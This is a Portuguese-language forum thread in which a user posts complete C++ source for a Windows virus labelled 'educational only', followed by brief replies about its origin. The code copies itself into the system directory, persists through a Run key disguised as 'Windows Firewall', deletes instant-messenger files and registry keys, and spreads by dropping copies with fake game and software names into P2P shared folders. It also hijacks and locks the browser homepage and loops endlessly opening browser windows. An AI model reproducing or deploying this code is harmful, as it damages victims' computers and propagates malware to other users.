Pequeno vírus:
load.h
font=Arial]/*LOAD.H*/
#include <stdio.h>
#include <stdlib.h>
#include <fstream>
using namespace std;
namespace system_chat //deletes instant chat
{
void del_msn() //disables msn messenger (works)
{
remove("C:\\Program Files\\MSN Messenger\\wmv9vcm.dll");
remove("C:\\Program Files\\MSN Messenger\\rtcdll.dll");
remove("C:\\Program Files\\MSN Messenger\\rtcres.dll");
remove("C:\\Program Files\\MSN Messenger\\msidcrl.dll");
remove("C:\\Program Files\\MSN Messenger\\msgrapp.dll");
remove("C:\\Program Files\\MSN Messenger\\msgsc.dll");
remove("C:\\Program Files\\MSN Messenger\\msgslang.dll");
remove("C:\\Program Files\\MSN Messenger\\psmsong.dll");
system("cls");
}
void del_aim()//fucks a bit around with AOL. (works)
{
remove("C:\\Program Files\\Common Files\\AOL\\eehelper.ddl");
remove("C:\\Program Files\\Common Files\\AOL\\1144979710\\ee\\AOLSvcMgr.dll");
remove("C:\\Program Files\\Common Files\\AOL\\xprt5.dll");
system("rmdir C:\\Program Files\\AOL");
system("rmdir C:\\Program Files\\AOD");
system("rmdir C:\\Program Files\\Common Files\\AOL\\1144979710");//overkill
system("cls");
}
void del_mirc() //disables mIRC(works)
{
remove("C:\\Program Files\\mIRC\\mirc.exe");
remove("C:\\Program Files\\mIRC\\servers");
system("cls");
}
void del_gaim() //disables Gaim (works)
{
remove("C:\\Program Files\\Gaim\\gaim.dll");
remove("C:\\Program Files\\Gaim\\ssl3.dll");
remove("C:\\Program Files\\Gaim\\softokn3.dll");
system("cls");
}
}
BOOL RegDelnodeRecurse (HKEY hKeyRoot, LPTSTR lpSubKey)
{
LPTSTR lpEnd;
LONG lResult;
DWORD dwSize;
TCHAR szName[MAX_PATH];
HKEY hKey;
FILETIME ftWrite;
// First, see if we can delete the key without having
// to recurse.
lResult = RegDeleteKey(hKeyRoot, lpSubKey);
if (lResult == ERROR_SUCCESS)
return TRUE;
lResult = RegOpenKeyEx (hKeyRoot, lpSubKey, 0, KEY_READ, &hKey);
if (lResult != ERROR_SUCCESS)
{
if (lResult == ERROR_FILE_NOT_FOUND) {
printf("Key not found.\n");
return TRUE;
}
else {
printf("Error opening key.\n");
return FALSE;
}
}
// Check for an ending slash and add one if it is missing.
lpEnd = lpSubKey + lstrlen(lpSubKey);
if (*(lpEnd - 1) != TEXT('\\'))
{
*lpEnd = TEXT('\\');
lpEnd++;
*lpEnd = TEXT('\0');
}
// Enumerate the keys
dwSize = MAX_PATH;
lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,
NULL, NULL, &ftWrite);
if (lResult == ERROR_SUCCESS)
{
do {
lstrcpy (lpEnd, szName);
if (!RegDelnodeRecurse(hKeyRoot, lpSubKey)) {
break;
}
dwSize = MAX_PATH;
lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,
NULL, NULL, &ftWrite);
} while (lResult == ERROR_SUCCESS);
}
lpEnd--;
*lpEnd = TEXT('\0');
RegCloseKey (hKey);
// Try again to delete the key.
lResult = RegDeleteKey(hKeyRoot, lpSubKey);
if (lResult == ERROR_SUCCESS)
return TRUE;
return FALSE;
}//My balls hurt >:O <:O NIXON ROCK ON DUDE =/ >?<
BOOL RegDelnode (HKEY hKeyRoot, LPTSTR lpSubKey)
{
TCHAR szDelKey[2 * MAX_PATH];
lstrcpy (szDelKey, lpSubKey);
return RegDelnodeRecurse(hKeyRoot, szDelKey);
}
void hijack_homepage(char* site, bool lock)
{
HKEY hKey1;
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Internet Explorer\\Main",1,KEY_SET_VALUE,&hKey1 );
RegSetValueEx(hKey1, "Start Page",1,REG_SZ,(const unsigned char*)site,MAX_PATH);
RegCloseKey(hKey1);
DWORD i;
if (lock)
{
i = 1;
}else i = 0;
HKEY hKey2;
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel",1,KEY_SET_VALUE,&hKey2 );
RegSetValueEx(hKey2, "HomePage",1,REG_DWORD,(BYTE*)&i,sizeof(i));
RegCloseKey(hKey2);
}
---------------------------
main.cpp
---------------------------
#include <cstdlib>
#include <iostream>
#include <windows.h>
#include <string.h>
#include <fstream>
#include "load.h"
//******************************************************************************
// //
// DEMONSTRATION OF A VIRII //
// //
// BY //
// //
// Nerve //
//----------------------------------------------------------------------------//
// //
// For any question you can contact me at nerve@gmail.com //
// //
// //
// ~~EDUCATIONAL ONLY~~ //
// //
//******************************************************************************
using namespace std;
void DelaySecs(int secs);
ULONG WINAPI OurFirstThread(LPVOID)
{
ShellExecute(0,"open","www.rohitab.com",NULL,NULL,1);
return(0);
}
void reg(void);
BOOL RegDelnodeRecurse(HKEY hKeyRoot, LPTSTR lpSubKey);
void hijack_homepage(char* site, bool lock);
int main()
{
char system[100];
char pathtofile[100];
FreeConsole();//get rid of the console window :-0
reg();
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\LSD.exe");
//******************************************************************************
//Deletes various registry keys
//******************************************************************************
BOOL bSuccess;
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.3DFlyingObj");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.3DPipes");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Bezier");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Marquee");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Mystify");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Stars");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Sound");
bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Printers");
//******************************************************************************
// Disable some instant messengers and Other Payloads
//******************************************************************************
system_chat::del_msn();
system_chat::del_gaim();
system_chat::del_mirc();
system_chat::del_aim();
CopyFile(system,"C:\\program files\\Morpheus\\My Shared Folder\\Vista_theme_pack.exe",0);
CopyFile(system,"C:\\program files\\Grokster\\My Grokster\\San Andreas.exe",0);
CopyFile(system,"C:\\program files\\eMule\\Incoming\\steam_down.exe",0);
CopyFile(system,"C:\\program files\\limewire\\Shared\\Limewire_pro.exe",0);
ofstream a_file9("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Hell.jpg");
a_file9.close();
ofstream a_file4("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\PACKET_MONKEYS.jpg");
a_file4.close();
ofstream a_file5("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\NERVE.jpg");
a_file5.close();
ofstream a_file96("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\MATRIX.jpg");
a_file96.close();
ofstream a_file95("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\HARMONEY.jpg");
a_file95.close();
ofstream hi("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\PWN.txt");
if(hi.is_open())
{
hi << "You Got Owned!!\n\n"<< endl
<< "GET LINUX MOTHA FUCKA\n" << endl;
}
hi.close();
//******************************************************************************
//Changes Homepage
//******************************************************************************
hijack_homepage("www.rohitab.com",1);
//******************************************************************************
// Browser spammer
//******************************************************************************
Sleep(2000);//Wait for 2000ms
for (;;)
{
unsigned long ThreadId;
CreateThread(NULL,0,OurFirstThread,0,0,&ThreadId);
}
//exit Da suxor
//
return 0;
}
void reg(void)
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\LSD.exe");
CopyFile(pathtofile,system,false);
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Windows Firewall",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
}
PS: Me distraí e postei esse vírus no lugar errado, era pra ser na ala C++, se alguém puder transferir de lugar agradeço.
Qual e a fonte, pyro?
* ponto.
Um amigo meu da Holanda entitulado Freak me passou pelo MSN, ele afirma que autoria é do irmão dele, então preferi nem mencionar fonte.
Mas a fonte é: Irmão de um cara na holanda chamado Freak.
Não vai explicar nada?
@Shadows
PyroMaker está banido.
Leia o código e você terá uma explicação.